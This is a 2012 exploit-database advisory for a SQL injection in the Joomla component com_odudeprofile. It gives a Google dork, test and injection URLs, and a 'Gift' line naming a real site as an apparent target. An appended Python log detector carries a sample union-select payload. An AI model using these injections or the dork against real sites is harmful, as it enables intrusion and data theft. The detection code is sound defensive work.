Wubi

Joomla Component com_odudeprofile SQLi


Joomla Component com_odudeprofile SQL Injection Vulnerability | Inj3ct0r - exploit database : vulnerability : 0day : shellcode

  • Exploit Title: Joomla com_odudeprofile V2.x Exploit
  • Google Dork: inurl:index.php?option=com_odudeprofile
  • Date: [24-07-2012]
  • Author: Daniel Barragan "D4NB4R"
  • Twitter: @D4NB4R
  • site: Poison Security
  • Vendor: ODude Network
  • Version: 2.7 & 2.8
  • Download: ODude Profile 2.8
  • License: Non-Commercial
  • Tested on: [Linux(arch)-Windows(7ultimate)]

______________________________________________________________________________________

site: http://poisonsecurity.wordpress.com/

Vendor: http://www.odude.com

Download: http://www.odude.com/home/profile.html

______________________________________________________________________________________

Test:

http://127.0.0.1/index.php?option=com_odudeprofile&view=search&profession=idtrue%27


Sql:

http://127.0.0.1/index.php?option=com_odudeprofile&view=search&profession=(SQL)





Gift:
http://www.eveproducciones.com.mx/perfil/



I'm not responsible for the use that is made of this.
_______________________________________________________________________________________
Daniel Barragan "D4NB4R"


# 1337day.com [2012-07-25]

Source: Joomla Component com_odudeprofile SQL Injection Vulnerability | Inj3ct0r - exploit database : vulnerability : 0day : shellcode
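
Added example (not part of the original post or the advisory): a detection pass over web-server access logs that flags requests to `com_odudeprofile` whose `profession` parameter carries the injection markers this advisory relies on (a stray quote, `union ... select`, SQL comments, hex literals). The log lines, client addresses and indicator names are constructed for illustration, and the patterns are heuristics rather than a complete SQL injection signature set.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format), not from any real server.
SAMPLE_LOG = """\
203.0.113.5 - - [25/Jul/2012:10:00:01 +0000] "GET /index.php?option=com_odudeprofile&view=search&profession=engineer HTTP/1.1" 200 5120
203.0.113.9 - - [25/Jul/2012:10:00:07 +0000] "GET /index.php?option=com_odudeprofile&view=search&profession=idtrue%27 HTTP/1.1" 500 312
203.0.113.9 - - [25/Jul/2012:10:00:09 +0000] "GET /index.php?option=com_odudeprofile&view=search&profession=999999.9%27%20union%20all%20select%200x31%2C0x31--%20x HTTP/1.1" 200 6044
203.0.113.7 - - [25/Jul/2012:10:00:12 +0000] "GET /index.php?option=com_content&view=article&id=7 HTTP/1.1" 200 9000
"""

# Client address and request target from a combined-format log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Heuristic indicators, matched against the URL-decoded parameter value.
# A legitimate profession value has no reason to contain any of these.
INDICATORS = {
    "quote": re.compile(r"['\"`]"),
    "union_select": re.compile(r"\bunion\b.*\bselect\b", re.I | re.S),
    "sql_comment": re.compile(r"--|/\*|#"),
    "hex_literal": re.compile(r"\b0x[0-9a-f]{2,}\b", re.I),
}


def suspicious_requests(log_text):
    """Return (client_ip, decoded_value, [indicator names]) per flagged request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        # parse_qs percent-decodes values, so %27 is inspected as a quote.
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if "com_odudeprofile" not in params.get("option", []):
            continue
        for value in params.get("profession", []):
            matched = [name for name, rx in INDICATORS.items() if rx.search(value)]
            if matched:
                hits.append((client, value, matched))
    return hits


if __name__ == "__main__":
    for client, value, matched in suspicious_requests(SAMPLE_LOG):
        print(client, matched, repr(value))
```

Hits on this parameter in historical logs are a reason to check whether the installed component is version 2.7 or 2.8 and to rotate Joomla account passwords.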
